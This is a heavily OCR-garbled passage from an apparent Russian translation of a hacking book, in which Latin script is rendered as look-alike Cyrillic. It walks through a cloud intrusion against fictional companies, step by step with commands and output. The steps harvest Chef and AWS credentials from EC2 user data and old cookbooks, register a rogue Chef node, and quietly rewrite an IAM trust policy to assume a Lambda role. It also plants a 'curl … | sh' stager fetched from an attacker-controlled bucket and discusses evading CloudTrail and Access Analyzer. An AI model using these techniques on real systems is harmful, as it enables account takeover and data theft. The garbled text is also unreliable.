соокБооК-тхгайѕ-аті Һёёрѕ : / /оіЁһиЬ. сот/тхгайѕ /соокБоок-аті. 91 

соокБооК -тхгайѕ - јепкіпѕ-сі Һ&рѕ: / /аіЁҺиь. сот/тхгааѕ /соокБоок - јепкіпѕ -сі.діё 
- -Сокращено- - 


Это успех ®! Скачиваем репозиторий сооКБоокК -тхгайѕ - јепкіпѕ -сі: 


гооЁ@Роіпї1:~/# АЕ с1опе ВЕЁрз: / /9іЕһиЬ. сот/тхгайѕ /сооКБооК-епК\Ап$-с\.91 


Затем мы просматриваем исходный код в надежде найти какие- 
нибудь жестко заданные учетные данные: 
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гооєё@Роіпё1:~/# едгер -1 “раѕѕмогд | зесге* | оКеп|Кеу” соокЬоок- јепкіпѕ-сі 


ЧеРаи1{[' јепкіпѕ' ][' кеуѕ' ]['орегаіопѕ_гейѕћіҒЕ гм раѕѕмогӣ'] = 'АОІСАНҺКтЕЕҒ2ЕсЈ09Х... ' 
ЧеРаи1{[' јепкіпѕ' ][' Ккеуѕ' ]['орегаіопѕ_амѕ_ассеѕ5_Кеу 1й'] = 'АОІСАНҺКтЕЕҒ2ЕсЈ09Х... ' 
ЧеРаи1{[' јепкіпѕ' ][' Кеуѕ' ]['орегаіопѕ_амѕ_ѕесгеЁ_ассеѕ5 Кеу'] = 'АОІСАНҺКтЕЕҒ2ЕсЈ09Х1м... ' 
ЧеРаи1{[' јепкіпѕ' ][' Ккеуѕ' ]['орегаіопѕ ргісе сірћег_сгурќо_Кеу'] = 'АОІСАНҺКмЁЕЕҒЈЕ... ' 


Мы обнаружили, что около 50 секретов хранятся в файле судобным 
названием ѕесгеіѕ.гЬ, но пока не радуйтесь. Это не просто пароли 
в открытом виде. Все они начинаются с шести волшебных букв АОТСАН, 
что предполагает использование АМ КМ5, службы управления клю- 
чами, предоставляемой АМ для шифрования/дешифрования дан- 
ных. Для доступа к их ключу расшифровки требуются определенные 
права ТАМ, которых, скорее всего, нет у нашего пользователя Кевина. 
Файл КЕАОМЕ поваренной книги довольно ясно описывает управле- 
ние секретами: 


# ВЕАОМЕ . та 
КМ5 Епсгур\оп : 


ЅесгеЁѕ тиѕі пом Бе епсгурёеа и$1пд КМ5. Неге 15 һом фо до 50. 
Геё'5 зау уоцг сгейепёіа15 аге іп /раёћ/ёо/сгейепіа15... 


(Секреты теперь должны быть зашифрованы с помощью КМ5. Вот как это теперь делается. 
Допустим, ваши учетные данные находятся в /раЁћ/+о/сгейепё\а15...) 


Единственное ключевое слово, которое мне нравится в этой цита- 
те, – «теперь». Это говорит о том, что не так давно секреты обрабаты- 
вались по-другому, возможно, вообще не шифровались. Взглянем на 
историю коммитов Сії: 


гооё@Роіп1:~/# 914 геу-1151 --а11 | хагдѕ 91% дгер "амѕ ѕесгеЁ" 

е365с0828298155... :ѕесгеЁѕ.гЬ: 

ЧеРаи1{[' јепкіпѕ' ][' Ккеуѕ' ]['орегаіопѕ_амѕ_ѕесгеЁ_ассеѕ5 Кеу'] = 'АДІСАНҺКтЕЕҒ2Ес709Х1м... ' 
623630ҒТаБ4с18Ғ... :ѕесгеЁѕ.гЬ: 

аеғаи1&[' јепкіпѕ' 11 'Кеуѕ' ]['орегаіопѕ амѕ ѕесгеі ассеѕѕ_ Кеу'] 


"АОТСАНҺКтЕҒ7Ес209Х1м...' 


Увы, все предыдущие версии зесге{$ .гЬ содержат те же зашифро- 
ванные данные. 

Это нормально. СіїНир - не единственный версионный репозито- 
рий для хранения поваренных книг. У СБеЁ есть собственное локаль- 
ное хранилище данных, в котором он хранит разные версии своих 
ресурсов. Если повезет, возможно, мы сможем загрузить более ран- 
нюю версию поваренной книги, которая содержала учетные данные 
в открытом виде. 

Связь с сервером Сһеѓ обычно хорошо защищена. Каждый сервер, 
управляемый Сһеғ, получает персональный закрытый ключ для за- 
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грузки поваренных книг, политик и других ресурсов. Администрато- 
ры также могут использовать токен АРІ для удаленного выполнения 
задач. 

Положительным моментом, однако, является отсутствие разде- 
ления ресурсов. Все, что нам нужно, - это действующий закрытый 
ключ, принадлежащий фиктивному тестовому серверу, все равно ка- 
кому, чтобы иметь возможность прочитать каждый файл кулинарной 
книги, когда-либо хранившийся на СһеЁ. Правильно, что за жизнь без 
доверия! 

Этот закрытый ключ не должен быть спрятан слишком далеко. У нас 
есть доступ для чтения к АРІ ЕС2, охватывающий около 2000 серве- 
ров. Наверняка у одного из них есть жестко запрограммированный 
закрытый ключ СПеЁ в пользовательских данных. Нам просто нужно 
выполнить 2000 вызовов АРІ. 

То, что поначалу кажется сложной и кропотливой задачей, на са- 
мом деле может быть легко автоматизировано. Благодаря поварен- 
ным книгам, хранящимся в репозиториях МХЕ АЯ на СіНиБ, мы 
уже знаем, какие сервисы полагаются на Сһеѓ: Саззапага (база дан- 
ных М№о5 ОГ), Каа (ПО для потоковой передачи), Јепкіпѕ, Мехиѕ (ре- 
позиторий кода), СгаЁапа (панели мониторинга и метрики) и еще 
несколько. 

Мы сохраняем эти имена служб как ключевые слова в файле, а за- 
тем передаем их в цикл, который извлекает экземпляры с именем 
тега, соответствующим ключевому слову, как показано далее. Мы из- 
влекаем идентификатор первого экземпляра каждого пула машин, 
принадлежащих к одной и той же службе, поскольку, например, все 
машины Саззапага, вероятно, будут использовать одни и те же поль- 
зовательские данные. Значит, нам нужен только один экземпляр: 


гооЁ@Роіпї1:~/# ине геад р; до 
іпѕёапсе1р=$(амѕ ес2 еѕсгіђБе-іпѕЁапсеѕ \ 
--ҒЛ+ег “Мате=Еад: Маме ,Ма\џеѕ=*$р*” \ 
--дџегу *Веѕегуа+іопѕ[0].Іпѕ+апсеѕ[].Іпѕ+апсеїй” \ 
- -гедіоп=еџ-меѕё-1 \ 
- -оџёриё=+ехё) 
есһо $іпѕ+апсеїр > 115 145.хЁ 
бопе <ѕегуісеѕ.ЁхЁ 


Этот сделанный буквально на коленке метод выборки дает нам око- 
ло 20 идентификаторов экземпляров. Каждый из них относится к ма- 
шине, на которой размещен какой-либо сервис: 


гооє@Роіп1:~/# һеаа 115 105.ЕхЕ 
1-08072939411515аас 
1-080746959025сеае 
1-91263120217есіеҒ 

- -Сокращено- - 
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Просмотрим этот файл в цикле, вызывая АРІ ес2 йеѕсгібе-іп- 
ѕіапсе-аіёгібиїе для извлечения пользовательских данных, их деко- 
дирования и сохранения в другом файле: 


гооё@Роіпё1:~/# мһћіЛе геай р; до 
иѕеграёа=5(аиѕ ес2 йеѕсгіђе-іпѕЕапсе-аёёгіђиёе \ 
--іпѕёапсе-ій $р \ 
--аёгіриёе изегОафа \ 
- -гедіоп=еџ-меѕЁ-1 \ 
| ја -г .Џѕегра+а.Ма\џе | Баѕеб4 -4) 
есһо $иѕеграа > $р. хе 
Чопе <11.$_19$.ЕхЕ 


Вызов АРІ їеѕсгіБе-іпѕЁапсе-аёёгібџиќе часто предо- 
ставляется без особых раздумий через политику йеѕсгіБе*. Если она за- 
блокирована, мы можем попытаться получить конфигурацию запуска 
группы автоматического масштабирования, которая обычно содер- 
жит те же данные: амѕ аџёоѕса1іпд еѕсгібе- аипсһ - сопҒідигаЁіопѕ 
или амѕ ес2 йеѕсгібе-1аипсһ - ёетр1аї+еѕ. 


Мы проверяем, сколько файлов было создано, и убеждаемся, что 
файлы содержат сценарии пользовательских данных: 


гооє@Роіп1:~/# 15 -1 1-*.ЁхЕ [ис -1 
21 
гооё@Роіп1:~/# са 1-08072939411515@ас.хЇ 


епсойіпд: 921р+раѕеб4 
раһ: /еёс/ѕѕһ/аџЁһ ргіпсіра15/иѕег 
регтіѕѕіопѕ: "0644" 
- сопёепё: |- 
#1 /Біп/Баѕћ 
- - Сокращено- - 


Идеально. Теперь настал момент истины. Хранится ли на каком-ли- 
бо из этих прекрасных серверов закрытый ключ СһеЁ, объявленный 
в их пользовательских данных? Ищем ключевые слова «ВЅА РЕГУАТЕ 
КЕҮ»: 


гооє@Роіпё1:~/# дгер -7 “ВЕСТМ В$А РВІМАТЕ КЕҮ” і-*. ЕХЕ 
- - Сокращено- - 
Ө саї << ЕОЕ 
сһеҒ_ѕегуег иг1 'НЕрз: //сһеЁ.тхгайѕ.пеё/огдапіғаііопѕ /тхгайѕ ' 
ма1ідаёіоп с1іепі_ пате ' сһеЁ-уа11йаќёог' 
ЕОЕ 
)> /еёс/сһеҒ/с1лепё. гЬ 


- - Сокращено- - 
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Ө саї << ЕОЕ 


МТТЕРАТВААКСАОЕАдО / 6бмоРВЧпи5\/}с5ВОеп8 КОМеРЕЕРр 
- -Сокращено- - 
)> /еёс/сһеҒ/ма1ідаёіоп. рет 


Здесь все очень просто. Первый фрагмент кода определяет ключе- 
вые параметры, используемые Сһеѓ, и сохраняет их в файле с1іепё. гЬ. 
Второй фрагмент записывает закрытый ключ в файл с именем уа1і- 
да оп .рем. 

Этот закрытый ключ отличается от того, на который мы рассчи- 
тывали, но мы заставим его работать. Полученный нами ключ - это 
закрытый проверочный ключ пользователя сһеҒ-үа\ійаїог, назна- 
ченный экземплярам для установления их первого контакта с серве- 
ром СһеЁ. Пользователю сһеЁ-уа\ійаїог не разрешено просматривать 
список машин, поваренные книги или выполнять другие конфиден- 
циальные операции, но он имеет полное право регистрировать кли- 
ентов (машины), а они в итоге получают закрытые ключи, которые 
могут выполнять указанные операции. Все хорошо, что хорошо кон- 
чается. 

Закрытый ключ этого пользователя используется всеми экземп- 
лярами, желающими присоединиться к серверу СһеЁ. Поэтому, естест- 
венно, мы также можем использовать его для регистрации дополни- 
тельной машины и получения нашего собственного закрытого ключа. 
Нам просто нужно имитировать реальную конфигурацию клиента 
и вежливо обратиться к серверу СВеЁ из УРС. 

Мы создаем необходимые файлы для инициации регистрации ма- 
шины - сС1іепі. гЬ ® и уа11аїіоп.реп Ө - и заполняем их данными, 
полученными из сценария данных пользователя, как показано далее. 
На самом деле это просто банальное копирование: 


мефегргефег > ехесифе -1 -Ё са << ЕОЕ 

сне#_зегмуег_иг\ 'НЕрз: //сһеҒ.тхгайѕ.пеё/огдапігаііопѕ /тхга4$' 
уа1ідаіоп_с1лепё_пате ' сһеЁ-ма1ійаќїог' 

ЕОЕ 

)> /еёс/сһе#/с1іепё. гЬ 


мефегргефег > ехесџЁе -1 -Ё са << ЕОЕ 
МІТЕРАІВААКСАОЕАдд/ бмоРВіпмЅ\јсЅА0епАЈКӘМеРЕГ ҒРр 


--5пір- - 
)> /еёс/сһеҒ/ма11даїіоп.рет 


Затем мы загружаем и запускаем клиента Сһеѓ из нашего бэкдора, 
чтобы инициировать процесс регистрации нашей машины: 


пеЁегргеёег > ехесифе -1 -Р ар ирдафе && арі іпѕёа11 -у сһеҒ 
пеЁегргеёег > ехесифе -1 -ЁҒ сһеЁ-с1іепё 
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ЅЕагііпд СһеҒ С1іепі, мегѕіоп 14.8.12 
Сгеа{1пд а пем с1іеп ійепёіёу Гог амѕ -пойе-78ес.еџ-меѕЁ-1.сотриїе.іпёегпа1 
иѕіпд {Ве уа11йаїог Кеу. 


Ѕупсһгопігіпд СоокБоокѕ: 

Іпѕёа111п9 СоокБоок бетѕ: 

Сотріїіпд СооКБоок$... 

Виппіпа һапд1егѕ сотр1еЁе 

Снег С1лепё Ғіпіѕһей, 0/0 гезоигсе$ ирӣаёеа іп 05 ѕесопӣѕ 


пеёегргеёег > 15 /еёс/сһеҒ/ 


с1лепі.рет с\Аепе.гЬ ма1іаёіоп. рет 


Вот и все. Мы это сделали. Мы протащили новую машину в каталог 
сервера СһеЁ и получили новый закрытый ключ с именем с1іепі. реп. 

Исполняемый файл сһеҒ-с1іепё обрабатывает состояние маши- 
ны, включая применение соответствующей поваренной книги, ре- 
гистрацию машины и многое другое. Чтобы исследовать ресурсы, 
определенные на сервере СһеЁ, нам нужно использовать утилиту 
КпіғҒе. Это часть стандартного пакета Сһеѓ, но для ее правильной 
работы требуется небольшой файл конфигурации. Ниже показан 
пример файла конфигурации, основанный на выводе ранее выпол- 
ненной команды сһеҒ-с|іепі (для получения имени машины) и кон- 
фигурации с\1іепё. гБ: 


# ~ /гоо/.сһеҒ/Кпіғе. гЬ 

пое пате ' амѕ -пойе- 78ес.еџ-меѕ-1.сотрие.іпёегпа1' 
с1лепі_Кеу ' /ес/сһеҒ/с1іепё.рет' 

сһеҒ ѕегуег иг1 'НЕрз: //сһеЁ.тхгайѕ.пеё/огдапіғаііопѕ /тхгайѕ ' 
Кпіғе[:едіёог] = ' /иѕг/Біп/уіт' 


Подготовив конфигурацию КпіҒе, можно воспользоваться этой 
утилитой для вывода каталога поваренных книг сервера Сһеѓ: 


мефегргефег > Кп\Ре соокБоокѕ 115% 


арї 7.2.0 
агк 4.0.0 
Биі1а-еѕѕепіћа1 8.2.1 
јепкіпѕ -сі 10.41.5 
- - Сокращено- - 


Фантастика, вот и драгоценная поваренная книга ]епК!1$. Давайте 
подробнее рассмотрим историю версий этой поваренной книги: 


мефегргефег > Кп\Ре соокБоокѕ ѕһом јепкіпѕ -сі 
10.9.5 10.9.4 10.9.4 10.9.3 10.9.2 10.9.1 10.9.8 10.9.7... 
4:31 4.3.0 3.12.9; 3.11.8 3.11.7 3.9.3 3.9.2.3.9;1 
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Мы видим, что коварный сервер СБеЁ хранит более 50 версий этой 
кулинарной книги, начиная с 10.9.5 и заканчивая 3.9.1. Теперь нам 
нужно найти самую последнюю поваренную книгу с учетными дан- 
ными в открытом виде - в идеале, непосредственно перед переходом 
на КМ5. 

Приступаем к проверке разных версий, начиная с последних, и пос- 
ле нескольких попыток останавливаемся на версии поваренной кни- 
ги 10.8.6: 


мефегргефег > Кп\Фе соокБоокѕ ѕһом јепкіпѕ-сі 10.8.6 


аїёгібџиѓеѕ: 
сһескКѕит: 320а841с055787айесЬіеЁ7е7а5#977е12130 
папе: аїігіриёеѕ /ѕесгеЁѕ.гЬ 
иг: В бре: //сһеҒ.тхгайѕ .пеё: 443 /Боокѕће1#/огдапіғаїіоп- 


26сЬБе406с5е38е16280084600774500/сһескѕит-320а841с055787айесЬіеҒ7е7а5#977е12а 
30?АМЅАссеѕ5КеуІй=25ессеб5728а20006іе4Ь#782ееда5087662119 
&Ехрігеѕ=1576042810851дпаїиге=ј9јағхг2јРКНОМСєд2г1А70%28Р24%30 

- -Сокращено- - 

мефегргефег > сиг1 һ&&рѕ: //сһеҒ.тхгайѕ.пеё:443/Боокѕһе1#/огд... 


© 'ДИЅ ЈЕМКІМ№Ѕ Ір' => 'АКІА5578К6252ХХ50040', 
"А5 ЈЕМКІМЅ ЅЕСАЕТ!' => 'бунНЕ+_8+0797АтНсиа1СаиІд0ЅсһдТ', 
- - Сокращено- - 


Не могу поверить, что мы это нашли! Ключи доступа Јепкіпѕ к АМ/5 
в открытом виде ®. Если это прелестное дитя не обладает полномо- 
чиями администратора учетной записи АМ, то я не знаю, кого еще 
искать. 

В листинге 10.7 мы последовательно выполняем пару вызовов АРІ 
А\МГ5, чтобы получить имя пользователя ІАМ, относящиеся к нему 
учетные данные, связанные политики, их последние версии и, нако- 
нец, их содержимое. 


Листинг 10.7. Просмотр прав доступа, предоставленных учетной 
записи Јепкіпѕ 


гооє@Роіп1:~/# мі -/.ам$ /сгейепёіа15 

[јепкіпѕ ] 

амѕ_ассеѕѕ_Кеу ій = АКІА557АК6752ХХ50040 
амз_зесге{_ассе$$_Кеу = бунЕ+_8+0797АтНсиа1СамІд0ѕсһТ 


# получение имени пользователя 
гооЁ@Роіпї1:~/# амз іам деё-иѕег --ргоҒі1е јепкіпѕ 
"ОѕегМате": "јепкіпѕ" 


# список связанных политик 

гооЁ@Роіпї1:~/# амз іам 115-аёёасһей-иѕег-ро1ісіеѕ \ 
- -иѕег-паме=јепкіпѕ \ 

--ргоғіЛе јепкіпѕ 


"Ро11суМате": "јепкіпѕ-ро1ісу", 
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"Ро1ісуАгп": "агп:амѕ :іат: : амз :ро1ісу/јепкіпѕ -ро1ісу" 


# деї ро1ісу мегѕіоп 

гоої@Роіпё1:~/# амѕ іам іат деё-ро1ісу \ 

- -ро1ісу-агп агп:амѕ :іам: :886371554408:ро1ісу/јепкіпѕ-ро1ісу \ 
--ргоҒіЛе јепкіпѕ 


"РеҒаџ1+Мегѕіоп1д": "\4", 
# де ро1ісу сопёепё 


гоої@Роіпї1:~/# амѕ іам іат деё-ро1ісу-мегѕіоп \ 
- -ро1ісу-агп агп:амѕ :іап: :886371554408:ро1ісу/јепкіпѕ-ро1ісу \ 
--мегѕіоп \4 \ 
--ргоР Де јепкіпѕ 
- - Сокращено- - 
"Асёіоп": [ 
"ат: *", 
"ес2:*", 
"525:*", 
"ЛатЬда:*", 
], 
"Веѕоџгсе": "*" 
- - Сокращено- - 


Вы только взгляните на эти звездочки в политике. Они повсюду. 
Јепкіпѕ имеет доступ ко всем сервисам АМ5, используемым МХК Ад$, 
от [АМ до Гатбаа и т. д. Наконец-то мы получили полный и бесспор- 
ный контроль над аккаунтом МХК Адѕ в АМ. 


В этом сценарии мы решили использовать ЕС2, чтобы 
получить контроль над инструментами управления, но возможны и дру- 
гие варианты: изучение 53 для поиска поваренных книг, резервных копий 
Јепкіпѕ, состояния Тегтајогт, учетных записей УРМ и т. д. То же самое 
верно для репозиториев СіїНир, документов Рупаторв и других сервисов. 


Захват Шатбаа 


Мы возвращаемся к нашей первоначальной цели, устроившей нам 
небольшое дополнительное приключение: олицетворение роли ІАМ, 
связанной с функцией Гатб@а 9тр-зупс, которая копирует данные 
в Стеїѕсһ РоПЯсо. 

Теперь, когда у нас есть неограниченный доступ к службе ТАМ, да- 
вайте исследуем роль Гатбаа (листинг 10.8). 


Листинг 10.8. Политика ІАМ для роли 1атбӣа-тр-ѕупс 


гооЁ@Роіпї1:~/# ехрогЕ АМ$_РВОЕТЕЕ=)епКАп$ 
гооє@Роіп1:~/# анѕ іат деЁ-го1е 1атбда-йтр-ѕупс 
"Ао1еМате": "атр-ѕупс", 
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"Агп": "агп: ам : Там: :886371554408 : го1е/9тр-зупс", 
"АѕѕитеВо1еРо1ісуроситепё": { 
"Мегѕіоп": "2012-10-17", 
"Ѕёаёемеп": [{ 
"ЕРҒесЕ": "А1Лом", 
"Ргіпсіра1": { 
"бегүісе": "ТамЬда. атагопамѕ . сот" 
}, 
"Асёіоп": "5 5:АѕѕитеВо1е" 
1 


- -Сокращено- - 


Свойство Аззимево1еРо11субосимеп{ указывает, какой сущности 
разрешено олицетворять данную роль. Обратите внимание, что един- 
ственным доверенным лицом, которое может взять на себя эту роль, 
является сам сервис АМ ГатБаа (ІатБаа.атағопамуѕ.сот). Поэтому 
нам нужно зарегистрировать новый сервис ГатђЬаа, назначить ему 
эту новую роль и выполнить любой код, который нам нравится. В ка- 
честве альтернативы мы могли бы обновить текущий код Гатбаа, 
чтобы добиться желаемого. 

Третий и, возможно, самый простой вариант - временно обновить 
политику роли, включив в нее пользователя ЈепКкіпѕ. Это изменение 
вряд ли продержится долго, поскольку любой, кто в это время выпол- 
нит команду еггаҒогт р1ап, заметит дополнительную учетную запись 
и удивленно поднимет брови. Поэтому нам нужно действовать быст- 
ро. Мы изменим политику «принятия роли», создадим временные 
учетные данные, действительные в течение 17 часов, и вернемся кис- 
ходной политике. Только войдем и выйдем, буквально на минуту. 

В листинге 10.9 мы сохраняем текущую политику роли в файле и не- 
заметно вводим строку "А\5": "агп:ам$ : Тат: :886371554408:0ѕег/јеп- 
Ккіпѕ", чтобы добавить Јепкіпѕ в качестве доверенного пользователя. 


Листинг 10.9. Политика роли ІАМ, позволяющая Јепкіпѕ олицетворять 
роль ІАМ, используемую ГатБаа 


{ 
"Мегѕіоп": "2012-10-17", 
"ЅЕаёетепё": [{ 
"ЕРҒесЕ": "А1Лом", 
"Ргіпсіра1": { 
"бегүісе": "ГатБаа. атагопамѕ. сот", 
"АМ": "агп:амѕ:1ат: :886371554408:0ѕег/јепкіпѕ" 


Ъ, 
"Асёіоп": "5 5 :АѕѕитеВо1е" 
}] 
} 


Мы отправляем эту новую политику роли и быстро запускаем АРІ- 
вызов аѕѕџпе - го1е, чтобы получить временные учетные данные, соот- 
ветствующие роли 1атБда-тр-ѕупс: 
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гоо@Ро1п{1:-/# амѕ іам ирдаёе-аѕѕите-го1е-ро\ісу \ 
--го1е-паме ТатЬда-дтр-$упс \ 
- -ро\Асу-доситепЕ Ее: / /пеи_ро\Асу. јѕоп 


гооЁ@Роіпё1:~/# амз 55 аѕѕите-го1е \ 

--го1е-агп агп:амѕ :іам: :886371554408 : и5ег/Лат6Ча-9тр-зупс \ 
--го1е-5е$$1оп-пате АИЅСІІ-Ѕеѕѕіоп \ 

- -дига\оп-зесоп4$ 43200 


"АссеѕѕКеуІй": "АЗТА447ВК6И$7АЕХВВОЕ", 

"бесге{АссеззКеу": "пб1МобЕПИТ "8 ВЗМКХ 998 С+тКи2О\/М0тов$ТВ7МС" , 
"ЅеѕѕіопТокеп": "Емоб2ХІМҮХа2Е1///... 

"Ехрігаёіоп": "2019-12-12710:31:537" 


Неплохо. Эти временные учетные данные будут действительны 
в течение 12 часов, даже если Јепкіпѕ больше не связан с политикой 
доверия. Наконец, мы восстанавливаем исходную политику, чтобы 
избежать каких-либо подозрений: 


гооЁ@Роіпї1:~/# амз Зам ирдаёе-аѕѕите-го1е-ро\ісу \ 
--го1е-паме ТатЬда-дтр-$упс \ 

--ро\Асу-доситепЕ Ее: / /о14_ро\ісу. јѕоп\ 

--ргоР Де јепкіпѕ 


Позже мы сосредоточимся на встроенных оповещени- 
ях и мерах обнаружения в АИ’, но, поскольку МХР Ай5, похоже, исполь- 
зует Јепкіпѕ для выполнения вызовов ІАМ АРІ, можно с уверенностью 
предположить, что эта операция затеряется среди обычных ежеднев- 
ных действий. 


Мы загружаем новые ключи в наш интерфейс командной строки 
АУ\У!$ и приступаем к изучению бакета Стеїѕсћ РоНИсо дгеезсй - < геап- 
1пд- 105$ (листинг 10.10). Он тот же самый, что используется ітр-ѕупс 
ГатЫаа, как мы обнаружили ранее в этой главе. 


Листинг 10.10. Список объектов, хранящихся в бакете дгеЁѕсһ- 
ѕігеатіпд - јоБѕ 


гооё@Роіпё1:~/# мі -/.ам$ /сгейепЕ\а15 

[атр -ѕупс] 

амѕ_ассеѕ5_Кеу ій = АЅІАД47АК6ИЅ7АҒХАВОЕ 

амѕ_ѕесгеЁ_ассеѕ5 Кеу = п5\М0ЕпиТм8АЗИКХадВС+тВу2ОММ9тоВ$Т ЈАС 
амѕ_5еѕѕіоп_Ёокеп = ЕмоС2ХІМҮХа2Е1//... 


гоої@Роіпё1:~/# амѕ 53арі 115&-оБјесЁѕ-у2 \ 
--Бискеё дгеёѕсһ-ѕгеатіпд-јоБѕ \ 


--ргоЁіЛе дтр-зупс > 115+ _оБјесёѕ ор. хе 


гоої@Роіпё1:~/# һеай 115% _оБјесіѕ_9р.ЕхЕ 
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"Кеу": "гЕр-Б\а-геѕр/2019/12/11/10/геѕр-0-141108-есейайе-123...", 
"Кеу": "гЕр-Б\а-геѕр/2019/12/11/10/геѕр-0-753а10-Зе1аЗсЬ-51с...", 
"Кеу": "гЕр-Б\а-геѕр/2019/12/11/10/геѕр-0-561058-8е85асі-175...", 
"Кеу": "гЕр-Б\а-геѕр/2019/12/11/10/геѕр-1-091648-135еас7-92#...", 
"Кеу": "гЕр-Б\а-геѕр/2019/12/11/10/геѕр-1-3Ғ1са8-йае1413-1Ға...", 
- -Сокращено- - 


МХК Ааѕ, по-видимому, отправляет в СР ответы, где сообщает, ка- 
кое видео было показано для данного идентификатора файла сооКіе 
на данном веб-сайте. Есть и другие ключевые показатели, которые, 
как ни странно, многие компании считают конфиденциальным ма- 
териалом, например необработанные логи каждого запроса на ставку, 
данные кампаний других клиентов... список можно продолжить. 

Бакет дгеЁѕсһ-ѕЁгеатіпд- јоБѕ поистине огромен. Он содержит те- 
рабайты необработанных данных, которые мы просто не можем об- 
рабатывать, да и незачем. Этим занимается СР, а мы лучше пойдем 
по следу из хлебных крошек и будем надеяться, что он приведет нас 
к финальному пирогу. 

Среди этого гигантского озера данных, спрятанного под чересчур 
заманчивым ключом һе1регѕ, мы находим несколько любопытных ис- 
полняемых файлов, которые были изменены всего пару недель назад: 


"Кеу": "һе1регѕ/есг-1одіп.5һ", 
"ГазЕМод\РАед": "2019-11-14115:10:43.0007", 
"Кеу": "һе1регѕ/90-тападе", 

"ГазЕМод\РАед": "2019-11-14115:10:43.0007", 
- -Сокращено- - 


Интересно. Оказывается, у нас есть исполняемые объекты, кото- 
рые, вероятно, выполняются на машинах, принадлежащих и управля- 
емых СР. Это вполне может быть нашим пропуском в аккаунт Сгеїѕсћ 
Роібісо на АМ/5. Наша роль ГапБаа по определению может записывать 
файлы в бакет дгеЁѕсһ-ѕёгеатіпд- 05$. Вопрос в том, достаточно ли 
сообразителен администратор СР, чтобы ограничить ГатђЬаа исклю- 
чительно подключами гір -Б1Я- геѕр? Давайте проверим это: 


гооЁ@Роіпї1:~/# амѕ 53арі риё-оБјесі \ 
--Брискеё дгеёѕсһ-ѕгеатіпд- јоБЬѕ \ 

--Кеу һе1регѕ/&еѕЕ.ҺЕті --Боду ёеѕЕ.һЕлІ \ 
- -рго Де дпр-зупс 


"ЕТад": "\"051аа2040аҒЫ7Ға525#20а27#5е8666\"" 


Сообщения об ошибке нет. Считайте это приглашением перешагнуть 
порог, ребята! Эти вспомогательные сценарии, вероятно, извлекаются 
и выполняются ресурсом СР. Если мы изменим их, то сможем перехва- 
тить поток выполнения и вызвать наш собственный стейджер, кото- 
рый обеспечит нам новую оболочку для компонента СР! 
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Мы загружаем һе1регѕ /есг-1одіп.5һ, добавляем команду для за- 
пуска нашего пользовательского стейджера теегргеег и повтор- 
но отправляем файл. Как обычно, стейджер будет размещен в еще 
одном поддельном сегменте нашего собственного аккаунта АМ/5 
дгеіѕсһ-һе1регѕ: 


гоої@Роіпё1:~/# амѕ 53Зарі деЁ-оБјесі \ 
--Бискеё дгеёѕсһ-ѕгеатіпд- јоЬѕ\ 

--Кеу һе1регѕ/есг_Лодіп.ѕһ есг-1одіп.ѕһ \ 
--ргоҒіЛе дтр-ѕупс 


гооЁ@Роіпё1:~/# есһо “гие || сиг1 һёрѕ: //дгеёѕсһ-һе1регѕ.53.атағопамѕ.сот/ 
Һе1рег.ѕһ |5һ” >> есг-1одіп.ѕһ 


гоої@Роіпё1:~/# амѕ 53арі риё-оБјесё \ 
--Бискеё дгеёѕсһ-ѕгеатіпд-јоБѕ \ 
--Кеу һе1регѕ/есг-1одіп.ѕһ \ 

--Боду есг-1одіп.ѕһћ \ 

--ргоЁі1е дтр-ѕупс 


А дальше мы просто ждем. Возможно, несколько часов. Мы ждем, 
пока кто-нибудь где-нибудь не активирует нашу полезную нагрузку, 
если это вообще когда-либо случится. В конце концов, у нас нет гаран- 
тии, что хелпер есг-109\п действительно используется. Мы даже не 
удосужились проверить, что он на самом деле сделал. В любом случае, 
теперь уже слишком поздно. Скрестим пальцы и будем надеяться на 
лучшее. 


Дополнительные ресурсы 


® Документация по А\М/5 5Т5 находится по адресу Рірѕ;//атхп.іо/ 
58/056М. 

• Дополнительную информацию о возможностях А\М/$ ГатЬда ищи- 
те в докладе сотрудника Соое Келси Хайтауэра Кирегпеез апа іће 
Раіћ 10 Ѕегуег1еѕѕ, показанном на КибеСоп 2018: ВИру/Ь.у/2 Вю! НР. 
(Да, вы правильно прочитали - он работает в Сооз]е.) 
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НЕСМОТРЯ НИ НА ЧТО, 
МЫ ПРОДОЛЖАЕМ 


Пока мы ждем срабатывания обратной оболочки, есть 
одна небольшая задача, требующая нашего неотложно- 
го внимания: обеспечение устойчивости присутствия 
в АМ. Можно возразить, что ключи доступа Јепкіпѕ обес- 
печивают всю необходимую нам устойчивость, поскольку 
такие ключи трудно менять, и чтобы обнаружить наличие 
жестко запрограммированных учетных данных, нужно просмотреть 
сотни заданий. Столь важная часть любой инфраструктуры ОеуОрз, 
по иронии судьбы, подвержена тем же заблуждениям, против кото- 
рых реуОрѕ так высокомерно воюет, – самым наглядным доказатель- 
ством является то, что учетные данные, которые мы получили от СВЕ, 
все еще очень часто используются. 
Тем не менее у нас есть возможность с пользой провести время 
в ожидании нашей оболочки на машине СР, поэтому давайте покреп- 
че вцепимся в МХВ Ад$. 


Часовые А\М/$ 


Резервное копирование учетной записи АМ требует чрезвычайно 
аккуратной навигации в коварном море инструментов мониторинга 
и конфиденциальных предупреждений. Разработчики АМ очень по- 
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старались, чтобы снабдить своих клиентов всевозможными индика- 
торами подозрительной активности и небезопасных конфигураций. 

В частности, есть две функции АМ, о которых следует знать пе- 
ред слепой атакой или внедрением бэкдора: ІАМ Ассеѕѕ Апа[улег 
и СоцаТга! п$1е 5. 

ТАМ Ассеѕѕ Апа|у7ег помечает каждый документ политики, предо- 
ставляющий разрешения на чтение/запись сторонним объектам. 
В первую очередь анализатор охватывает бакеты $3, ключи КМ5, 
функции ГатЪаа и роли ІАМ. Сразу после своего появления он сделал 
неактуальной одну очень скрытную стратегию сохранения: создание 
роли администратора в учетной записи жертвы и предоставление 
привилегий чужой (т. е. нашей) учетной записи АМ. 

Мы можем быстро проверить, имеются ли какие-либо отчеты Ас- 
сеѕ5 Апа|у7ет, созданные в регионе ец-ие${-1: 


гоо@Ро1п{1:-/# амѕ ассеѕѕапа\уғег 115Ё-апа1уғегѕ --гед\оп=еи-иез*-1 
{ "апа1уғегѕ": [] } 


МХК Ад$ еще не использует эту функцию, но мы не можем всерьез 
рассчитывать, что компания всегда будет игнорировать инструмент 
безопасности, который позволяет раскрыть наш бэкдор одним щелч- 
ком мыши. 

СоцаТга!й - это сервис А\М5, который регистрирует почти каждый 
вызов АРІ АМ в формате ]5ОМ и при необходимости сохраняет его на 
55 и/или перенаправляет в другой сервис, например СІоиаМаќсһ, для 
